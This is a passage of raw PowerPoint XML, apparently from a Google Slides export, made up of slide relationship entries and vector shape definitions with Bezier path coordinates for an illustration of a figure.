Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag610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7.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag341.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag34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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag343.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag34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5.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag347.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag349.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag34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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag351.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag35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8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag354.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png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15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="10504805" y="4194810"/>
            <a:ext cx="2939415" cy="4041775"/>
            <a:chOff x="-1006072" y="1271750"/>
            <a:chExt cx="4357952" cy="5991287"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="90" name="Google Shape;57;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1068003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Google Shape;58;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="136840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Google Shape;59;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="166885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Google Shape;60;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1968814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Google Shape;61;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2269261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Google Shape;62;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2569708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63;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2866777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64;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1055875" y="4208223"/>
              <a:ext cx="502564" cy="182865"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12348" h="4493" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="9838" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9200" y="0"/>
                    <a:pt x="8568" y="272"/>
                    <a:pt x="8132" y="800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7799" y="1192"/>
                    <a:pt x="7620" y="1669"/>
                    <a:pt x="7608" y="2145"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2941" y="2181"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2906" y="1847"/>
                    <a:pt x="2739" y="1514"/>
                    <a:pt x="2465" y="1264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2206" y="1047"/>
                    <a:pt x="1887" y="940"/>
                    <a:pt x="1570" y="940"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1173" y="940"/>
                    <a:pt x="778" y="1107"/>
                    <a:pt x="500" y="1431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2002"/>
                    <a:pt x="84" y="2883"/>
                    <a:pt x="655" y="3395"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="915" y="3612"/>
                    <a:pt x="1233" y="3719"/>
                    <a:pt x="1550" y="3719"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1947" y="3719"/>
                    <a:pt x="2342" y="3552"/>
                    <a:pt x="2620" y="3228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2822" y="3002"/>
                    <a:pt x="2917" y="2728"/>
                    <a:pt x="2953" y="2443"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7620" y="2395"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7668" y="2978"/>
                    <a:pt x="7918" y="3562"/>
                    <a:pt x="8418" y="3955"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8832" y="4316"/>
                    <a:pt x="9346" y="4492"/>
                    <a:pt x="9859" y="4492"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10496" y="4492"/>
                    <a:pt x="11131" y="4220"/>
                    <a:pt x="11573" y="3693"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12347" y="2752"/>
                    <a:pt x="12228" y="1335"/>
                    <a:pt x="11288" y="538"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10868" y="176"/>
                    <a:pt x="10351" y="0"/>
                    <a:pt x="983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65;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1063608" y="241097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1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="525" y="1"/>
                    <a:pt x="1" y="525"/>
                    <a:pt x="1" y="1167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1799"/>
                    <a:pt x="525" y="2322"/>
                    <a:pt x="1168" y="2322"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1811" y="2322"/>
                    <a:pt x="2323" y="1799"/>
                    <a:pt x="2323" y="1167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2323" y="525"/>
                    <a:pt x="1811" y="1"/>
                    <a:pt x="11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Google Shape;66;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1063608" y="227772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0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="525" y="0"/>
                    <a:pt x="1" y="524"/>
                    <a:pt x="1" y="1167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1798"/>
                    <a:pt x="525" y="2322"/>
                    <a:pt x="1168" y="2322"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1811" y="2322"/>
                    <a:pt x="2323" y="1798"/>
                    <a:pt x="2323" y="1167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2323" y="524"/>
                    <a:pt x="1811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Google Shape;67;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1069916" y="1822700"/>
              <a:ext cx="914936" cy="110053"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="22480" h="2704" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="2703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22480" y="2703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Google Shape;68;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1069916" y="1981143"/>
              <a:ext cx="745828" cy="54335"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1832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Google Shape;69;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1069916" y="2069828"/>
              <a:ext cx="745828" cy="54823"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="18325" h="1347" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324" y="1346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Google Shape;70;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1069916" y="2158512"/>
              <a:ext cx="489947" cy="54335"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12038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2038" y="1334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Google Shape;71;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1130966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Google Shape;72;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1267636" y="5001539"/>
              <a:ext cx="219536" cy="194831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5394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60" y="4787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Google Shape;73;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1403330" y="5001539"/>
              <a:ext cx="220513" cy="194831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5418" h="4787" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3346" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2084" y="4787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Google Shape;74;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1539471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Google Shape;75;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1675653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Google Shape;76;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1811835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Google Shape;77;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1598120" y="4774272"/>
              <a:ext cx="1247862" cy="2488764"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="30660" h="61149" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="727" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11014"/>
                    <a:pt x="3072" y="44744"/>
                    <a:pt x="4144" y="56293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4168" y="56603"/>
                    <a:pt x="4453" y="56960"/>
                    <a:pt x="4477" y="57245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4644" y="59019"/>
                    <a:pt x="4751" y="60091"/>
                    <a:pt x="4751" y="60258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4779" y="60847"/>
                    <a:pt x="6567" y="61148"/>
                    <a:pt x="8454" y="61148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10570" y="61148"/>
                    <a:pt x="12810" y="60770"/>
                    <a:pt x="12835" y="59996"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12871" y="57055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13276" y="56186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15633" y="14514"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15615" y="14003"/>
                    <a:pt x="15763" y="13674"/>
                    <a:pt x="15908" y="13674"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16040" y="13674"/>
                    <a:pt x="16169" y="13945"/>
                    <a:pt x="16169" y="14597"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16122" y="24872"/>
                    <a:pt x="18622" y="46697"/>
                    <a:pt x="19003" y="55733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19027" y="55948"/>
                    <a:pt x="19348" y="56162"/>
                    <a:pt x="19348" y="56364"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19455" y="58567"/>
                    <a:pt x="19527" y="59936"/>
                    <a:pt x="19539" y="60079"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19635" y="60525"/>
                    <a:pt x="21296" y="60734"/>
                    <a:pt x="23092" y="60734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25274" y="60734"/>
                    <a:pt x="27656" y="60426"/>
                    <a:pt x="27683" y="59865"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27683" y="59734"/>
                    <a:pt x="27790" y="58424"/>
                    <a:pt x="27921" y="56257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27933" y="56007"/>
                    <a:pt x="28171" y="55733"/>
                    <a:pt x="28194" y="55448"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28921" y="44041"/>
                    <a:pt x="30659" y="13573"/>
                    <a:pt x="29385" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29385" y="48"/>
                    <a:pt x="15360" y="0"/>
                    <a:pt x="727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Google Shape;78;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1615091" y="4944844"/>
              <a:ext cx="1192103" cy="155596"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="29290" h="3823" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="16252" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1310"/>
                    <a:pt x="5668" y="3822"/>
                    <a:pt x="15443" y="3822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25230" y="3822"/>
                    <a:pt x="29290" y="1310"/>
                    <a:pt x="29290" y="1310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16252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Google Shape;79;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1944598" y="1693805"/>
              <a:ext cx="632885" cy="1078224"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="15550" h="26492" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7870" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7870" y="0"/>
                    <a:pt x="131" y="3787"/>
                    <a:pt x="131" y="7335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="10907"/>
                    <a:pt x="0" y="21860"/>
                    <a:pt x="1977" y="26492"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13657" y="26492"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15348" y="23587"/>
                    <a:pt x="15550" y="10918"/>
                    <a:pt x="15550" y="7370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15550" y="3822"/>
                    <a:pt x="7870" y="0"/>
                    <a:pt x="7870" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="03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Google Shape;80;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2657416" y="3209578"/>
              <a:ext cx="399348" cy="940170"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9812" h="23100" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7287" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="310" y="5215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4287" y="15097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="20014"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="20014"/>
                    <a:pt x="897" y="23099"/>
                    <a:pt x="1032" y="23099"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1034" y="23099"/>
                    <a:pt x="1035" y="23099"/>
                    <a:pt x="1036" y="23098"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1155" y="23039"/>
                    <a:pt x="8978" y="18074"/>
                    <a:pt x="9395" y="16038"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9811" y="14002"/>
                    <a:pt x="7287" y="0"/>
                    <a:pt x="7287" y="0"/>
                  </a:cubicBez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Google Shape;81;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1425104" y="3226997"/>
              <a:ext cx="400814" cy="942124"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9848" h="23148" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2835" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2835" y="1"/>
                    <a:pt x="1" y="13538"/>
                    <a:pt x="418" y="15562"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="834" y="17610"/>
                    <a:pt x="8704" y="23087"/>
                    <a:pt x="8823" y="23146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8825" y="23147"/>
                    <a:pt x="8826" y="23148"/>
                    <a:pt x="8828" y="23148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8963" y="23148"/>
                    <a:pt x="9847" y="20063"/>
                    <a:pt x="9847" y="20063"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5561" y="15145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9538" y="5263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835" y="1"/>
                  </a:ln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Google Shape;82;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1367473" y="2660053"/>
              <a:ext cx="1682009" cy="2371589"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="41327" h="58270" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="17026" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17026" y="0"/>
                    <a:pt x="9489" y="2917"/>
                    <a:pt x="6930" y="4656"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3524" y="6966"/>
                    <a:pt x="107" y="15717"/>
                    <a:pt x="0" y="18515"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="18515"/>
                    <a:pt x="4929" y="19693"/>
                    <a:pt x="9156" y="20836"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9275" y="22872"/>
                    <a:pt x="9192" y="25194"/>
                    <a:pt x="8799" y="27873"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8585" y="29230"/>
                    <a:pt x="6179" y="44482"/>
                    <a:pt x="5298" y="52090"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5239" y="52566"/>
                    <a:pt x="6358" y="53614"/>
                    <a:pt x="6299" y="54067"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6120" y="55543"/>
                    <a:pt x="5906" y="57150"/>
                    <a:pt x="6096" y="57436"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6346" y="57817"/>
                    <a:pt x="13299" y="58270"/>
                    <a:pt x="21443" y="58270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28730" y="58270"/>
                    <a:pt x="35147" y="57615"/>
                    <a:pt x="35421" y="57353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35671" y="57162"/>
                    <a:pt x="35445" y="56210"/>
                    <a:pt x="35338" y="54531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35326" y="54186"/>
                    <a:pt x="36445" y="53305"/>
                    <a:pt x="36409" y="52924"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36017" y="46613"/>
                    <a:pt x="33873" y="32183"/>
                    <a:pt x="33814" y="31326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33552" y="27218"/>
                    <a:pt x="33683" y="23813"/>
                    <a:pt x="33992" y="20967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38576" y="20265"/>
                    <a:pt x="41327" y="15955"/>
                    <a:pt x="41327" y="15955"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41208" y="12633"/>
                    <a:pt x="39803" y="7489"/>
                    <a:pt x="37005" y="5715"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35135" y="4037"/>
                    <a:pt x="28349" y="1263"/>
                    <a:pt x="26480" y="715"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25721" y="492"/>
                    <a:pt x="25006" y="422"/>
                    <a:pt x="24298" y="422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23141" y="422"/>
                    <a:pt x="22001" y="607"/>
                    <a:pt x="20706" y="607"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19621" y="607"/>
                    <a:pt x="18427" y="477"/>
                    <a:pt x="17026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Google Shape;83;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2053022" y="2400797"/>
              <a:ext cx="384615" cy="318925"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9450" h="7836" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="587" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="587" y="1"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="599" y="1477"/>
                    <a:pt x="492" y="4513"/>
                    <a:pt x="182" y="6370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="7389"/>
                    <a:pt x="2797" y="7835"/>
                    <a:pt x="5353" y="7835"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7485" y="7835"/>
                    <a:pt x="9449" y="7525"/>
                    <a:pt x="9374" y="6978"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9255" y="6644"/>
                    <a:pt x="8909" y="2549"/>
                    <a:pt x="9016" y="382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Google Shape;84;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2076873" y="2363963"/>
              <a:ext cx="343142" cy="217135"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8431" h="5335" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="8430" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="906"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="906"/>
                    <a:pt x="72" y="1441"/>
                    <a:pt x="13" y="2382"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="2382"/>
                    <a:pt x="2525" y="5335"/>
                    <a:pt x="4311" y="5335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6097" y="5335"/>
                    <a:pt x="8395" y="2596"/>
                    <a:pt x="8395" y="2596"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8395" y="2596"/>
                    <a:pt x="8347" y="775"/>
                    <a:pt x="8430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Google Shape;85;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2493640" y="1956032"/>
              <a:ext cx="179528" cy="223443"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4411" h="5490" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2769" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2657" y="0"/>
                    <a:pt x="2540" y="11"/>
                    <a:pt x="2417" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1215" y="273"/>
                    <a:pt x="405" y="1035"/>
                    <a:pt x="203" y="2559"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="4094"/>
                    <a:pt x="762" y="4904"/>
                    <a:pt x="1691" y="5380"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1833" y="5455"/>
                    <a:pt x="1976" y="5489"/>
                    <a:pt x="2117" y="5489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3105" y="5489"/>
                    <a:pt x="4040" y="3818"/>
                    <a:pt x="4227" y="2475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4411" y="1081"/>
                    <a:pt x="3868" y="0"/>
                    <a:pt x="2769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Google Shape;86;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2572150" y="1956113"/>
              <a:ext cx="78999" cy="49817"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1941" h="1224" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="820" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="433" y="0"/>
                    <a:pt x="155" y="140"/>
                    <a:pt x="155" y="140"/>
                  </a:cubicBezTo>
                  <a:lnTo>
